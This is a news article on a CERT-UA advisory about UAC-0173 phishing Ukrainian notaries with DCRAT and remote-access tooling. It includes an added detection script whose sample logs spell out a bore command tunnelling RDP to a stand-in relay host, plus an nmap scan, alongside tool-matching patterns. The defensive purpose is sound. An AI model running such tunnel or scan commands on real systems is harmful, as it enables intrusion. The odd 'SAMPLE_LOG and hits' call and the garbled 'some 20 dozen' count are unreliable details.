CERT-UA warns of UAC-0173 attacks compromising Ukrainian notaries by deploying DCRAT

February 26, 2025Ravi LakshmananNetwork Security/Threat Intelligence

On Tuesday, the Computer Emergency Response Team of Ukraine (CERT-UA) warned of renewed activity by an organized criminal group it tracks as UAC-0173 that involves infecting computers with a remote access trojan known as DCRAT (aka DarkCrystal RAT).

The Ukrainian cybersecurity authority said it observed the latest wave of attacks beginning in mid-January 2025. The activity is designed to target Ukrainian notaries.

The infection chain uses phishing emails that claim to be sent on behalf of the Ukrainian Ministry of Justice and urge recipients to download an executable file. The binaries are hosted on Cloudflare's R2 cloud storage service.

“Having obtained initial access to the notary's automated workstation in this way, the attackers took measures to add RDPWrapper, which implements the functionality of parallel RDP sessions. In combination with the use of the bore utility, this allows an RDP connection to be established directly from the Internet to the computer,” CERT-UA said.

The attacks are also characterized by the use of other malware families and tools, such as Fiddler to intercept authentication data entered into the web interface of the state registers, NMAP for network scanning, and XWORM for stealing sensitive data such as credentials and clipboard contents.

Additionally, the compromised systems are used as a conduit for drafting and sending malicious emails with the sendmail console utility, further propagating the attack.
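The tooling CERT-UA describes (RDPWrapper plus bore for Internet-reachable RDP, then NMAP, Fiddler and sendmail on the compromised workstation) is a sequence a defender can look for in process-creation telemetry. The following is an added example written for this page, not code from CERT-UA or the article: it parses a constructed, simplified process-creation log format, flags the tools the advisory names, and reports hosts where RDPWrapper and bore were both seen. The log line layout, the host and user names, the image-name patterns (such as `RDPWInst.exe` and `rdpwrap.dll`) and the `bore local ... --to` command form are assumptions; real Sysmon or EDR output has different fields and the patterns would need tuning to it.

```python
"""Scan constructed process-creation log lines for the post-compromise
tooling named in the CERT-UA UAC-0173 advisory. Added example; the log
format, sample lines and image-name patterns are assumptions for
illustration, not indicators published by CERT-UA."""
import re
from dataclasses import dataclass

# Tool indicators named in the article. The image-name regexes are
# assumptions about how the tools commonly appear on disk / on the
# command line; they are not page-given IoCs.
TOOL_PATTERNS = {
    "RDPWrapper (parallel RDP sessions)": re.compile(r"rdpw(?:rap|inst)\.(?:exe|dll)", re.I),
    "bore (tunnelling RDP from the Internet)": re.compile(r"(?:^|\\)bore\.exe\b", re.I),
    "NMAP (network scanning)": re.compile(r"(?:^|\\)nmap\.exe\b", re.I),
    "Fiddler (interception of web-form credentials)": re.compile(r"fiddler", re.I),
    "sendmail console utility (outbound phishing)": re.compile(r"(?:^|\\)sendmail\.exe\b", re.I),
}

# Constructed log format: "<timestamp> host=<h> user=<u> parent=<p> cmd=<command line>"
LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+user=(?P<user>\S+)\s+"
    r"parent=(?P<parent>\S+)\s+cmd=(?P<cmd>.*)$"
)


@dataclass
class Finding:
    ts: str
    host: str
    user: str
    tool: str
    cmd: str


def parse_line(line):
    """Return the fields of one log line, or None if it is malformed."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def scan(lines):
    """Return one Finding per (line, matched tool) pair."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for tool, pat in TOOL_PATTERNS.items():
            if pat.search(rec["cmd"]):
                findings.append(Finding(rec["ts"], rec["host"], rec["user"], tool, rec["cmd"]))
    return findings


def hosts_with_rdp_exposure(findings):
    """Hosts on which both RDPWrapper and bore were observed: the pairing the
    advisory describes as allowing RDP straight from the Internet."""
    tools_by_host = {}
    for f in findings:
        tools_by_host.setdefault(f.host, set()).add(f.tool)
    return sorted(
        host for host, tools in tools_by_host.items()
        if any(t.startswith("RDPWrapper") for t in tools)
        and any(t.startswith("bore") for t in tools)
    )


# Constructed sample telemetry (hostnames, paths and relay name are made up).
SAMPLE_LOG = [
    r"2025-01-21T09:14:02Z host=NOTARY-PC1 user=notary parent=explorer.exe cmd=C:\Users\notary\Downloads\Order_MinJust.exe",
    r"2025-01-21T09:15:40Z host=NOTARY-PC1 user=notary parent=Order_MinJust.exe cmd=C:\ProgramData\rdpwrap\RDPWInst.exe -i",
    r"2025-01-21T09:16:05Z host=NOTARY-PC1 user=notary parent=cmd.exe cmd=C:\ProgramData\bore.exe local 3389 --to relay.example",
    r"2025-01-21T09:30:11Z host=NOTARY-PC1 user=notary parent=cmd.exe cmd=C:\Tools\nmap.exe -sS 192.168.1.0/24",
    r"2025-01-21T10:02:55Z host=NOTARY-PC1 user=notary parent=cmd.exe cmd=C:\Tools\sendmail.exe -t < mail.txt",
    r"2025-01-21T10:05:00Z host=NOTARY-PC2 user=clerk parent=explorer.exe cmd=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
]

if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for h in hits:
        print(f"{h.ts} {h.host} {h.user}: {h.tool}: {h.cmd}")
    print("hosts with Internet-reachable RDP tooling:", hosts_with_rdp_exposure(SAMPLE_LOG and hits))
```

The per-host correlation is the useful part: a single RDPWrapper install may be a legitimate administrator's doing, but RDPWrapper followed by a tunnelling binary on a notary's workstation is the exact combination the advisory describes and is worth an alert on its own, independent of any malware hash.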

The development comes as CERT-UA attributed a sub-cluster within the Sandworm hacking group (aka APT44, Seashell Blizzard, and UAC-0002), tracked as UAC-0212, to the exploitation of a now-patched security flaw in Microsoft Windows (CVE-2024-38213, CVSS score: 6.5) via booby-trapped documents in late 2024.

The attack chain is known to run PowerShell commands that display decoy files while simultaneously launching additional payloads in the background, including Golang-based loaders named SecondBest (aka EmpirePast), Spark, and Crookbag.

Activity attributed to UAC-0212 has targeted supplier companies in Serbia, the Czech Republic and Ukraine between July 2024 and February 2025, some 20 dozen of them Ukrainian companies specializing in the development of automated process control systems (ACST), electrical work, and freight transport.

Some of these attacks have been documented by StrikeReady Labs and Microsoft, the latter tracking the threat group under the moniker BadPilot.
